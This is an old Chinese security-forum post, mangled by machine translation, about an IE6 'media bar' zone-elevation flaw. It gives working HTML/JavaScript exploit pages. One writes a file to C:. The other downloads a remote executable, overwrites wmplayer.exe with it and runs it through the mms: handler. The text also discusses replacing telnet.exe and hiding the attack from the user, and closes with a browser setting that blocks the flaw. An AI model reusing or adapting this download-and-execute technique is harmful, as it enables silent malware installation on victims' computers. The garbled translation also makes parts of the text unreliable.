MediaPlayer+IE6 the latest vulnerability of the simple research-vulnerability warning-the black bar safety net

ID MYHACK58:6220069345
Type myhack58
Reporter 佚名
Modified 2006-05-26T00:00:00


This vulnerability only IE6. 0 and above versions. Because from IE6 began to support something like the following java script:window. open("http://ip/";,"_media"); The main problem out here.

All of the following code are in XP+WMP8. 0+IE6. 0 1+IIS6. 0 environment test pass. Wherein xp and IE by windows Update as of posting time Microsoft patch. But there are still vulnerabilities

Look at the following code: <html> <body> <textarea id="code" style="display:none"> var s=new ActiveXObject(\"ADODB. Stream\");s. Type=2;s. Open();s. WriteText(\"ie bug test ok\");s. SaveToFile(\"c:\\\\bugtest.txt\",1); </textarea> <! Note that a textarea does not wrap> <script> url="file:java script:eval(decodeURI(\""+document. all. code. value+"\"))" //note that the forum automatically in the"javascript"to insert a space window. open(url,"_media"); //the main concern of this sentence </script> write a file bugtest.txt to c: </body> </html>

将 代码 保存 为 ie6bug.htm and then the local with IE open. The results in the c-disc generates a named bugtest. txt file, and open the IE window is more of a“media bar”. The ie6bug. htm put to IIS, via http://ip/ie6bug. htm access, the vulnerability is still valid. Isn't there some“horror”.

If the window. open(url,"_media")to the window. open(url), then there will be a security warning“this computer's security settings prohibit access to the other domain of the data source.” This is to be expected. Whether it is local open the html file or access the web, the IE“domain environment”is“Internet”. The General case can only read and write to the IE cache, etc. minority of several places. But Microsoft seems to made a error, when a new window is to enable the“media bar”, the“domain environment”turns into“my computer”, i.e. the local domain. A separate execution window. open("about :blank","_media");it can be in the IE status bar to see this change.

However, not all"_media"fault. If you remove the url in the"file:", in local open no problem. But as the web pages remote access, warning“no permissions”. As for why"_media"+"file:"will cause a“domain environment”changes, I don't know.

By the way, with the"_search"instead of"_media"does not produce vulnerability.

Can any write a program to the local, then just let the program run. Vulnerability Description by the way is: 下载恶意程序复盖wmplayer.exe and then location. href="mms:"; Thus, 在windows文件保护起效前调用wmplayer.exe a malicious program performs. 也 可以 替换 telnet.exe with location. href="telnet:"execute. The reason is very simple, but to have practical value but also to solve the“invisibility”problem.

When target="_media", there will always be the“media bar”, even using the<iframe>,<frame>“frame”: the <iframe src="url" target="_media" height="1" width="1"></iframe>

First open a new window, then the window. open(url,"_media"), and then close the window. Parent window and child window will appear“media bar”. The sub-window can be closed, but the parent window doesn't work.

Use showModalDialog instead of the open or not.

Try a lot of ways can't hide the“media bar”. Vulnerability description used in the method is: The first window. open(url,"_media")and then the window. open("error. jsp","_media") By accessing the error. the jsp returns an error, so the“media bar”disappeared. This way I test is unsuccessful, because playing the patch. But Microsoft's patch seems to just make returns an error,“media bar”does not disappear. But“the domain environment”changes still occur, so the vulnerability still exists. In fact, as long as the malicious program can be run, then find the new window name and close it, then open a normal, so it is hidden. For xp, the same window set in a taskbar window. So the window of the number of changes is not obvious.

Who is find the well hidden way, please share about it.

I put the vulnerabilities introduced in the code changes a bit, and removed to eliminate the“media bar”feature because playing the patch is useless.

<html> <body> <textarea id="code" style="display:none"> var h=new ActiveXObject("Microsoft. XMLHTTP"); h. open("GET","";,false); h. send(); var s=new ActiveXObject("ADODB. Stream"); s. type=1; s. open(); s. write(h. Responsebody); s. savetofile("c:\\program files\the\windows media player\\wmplayer.exe",2); s. close; location. href="mms:"; </textarea> <script> var url=document. all. code. value; url=url. replace(/\r\n/g,""); url=url. replace(/\\/g,"\\\\"); url=url. replace(/\"/g,"\\\""); url=url. replace(/\//g,"%2f"); window. open("file:java script:eval(decodeURI(\""+url+"\"))","_media"); //note that the forum automatically in the"javascript"to insert a space </script> ie6 bug test. </body> </html>

Test the code before 请 先 备份 wmplayer.exe the. While windows File Protection will restore it, but just in case. Implementation of the results is to run the program: 英文版msconfig.exe the. The program is from sometips Download, size 101k on. If the network speed is slow, the code page open also slower. If the WFP to restore file when msconfig is running in the windows media player directory to generate a tmp file, 其实它就是msconfig.exe the.

Blocked vulnerability the approach is very simple: IE-under Tools-on the Internet Options-under Advanced-under multimedia:"is not in the media bar display online media content"is selected on it. Everyone hastened to set before and in the XX“hack”the site of the trick.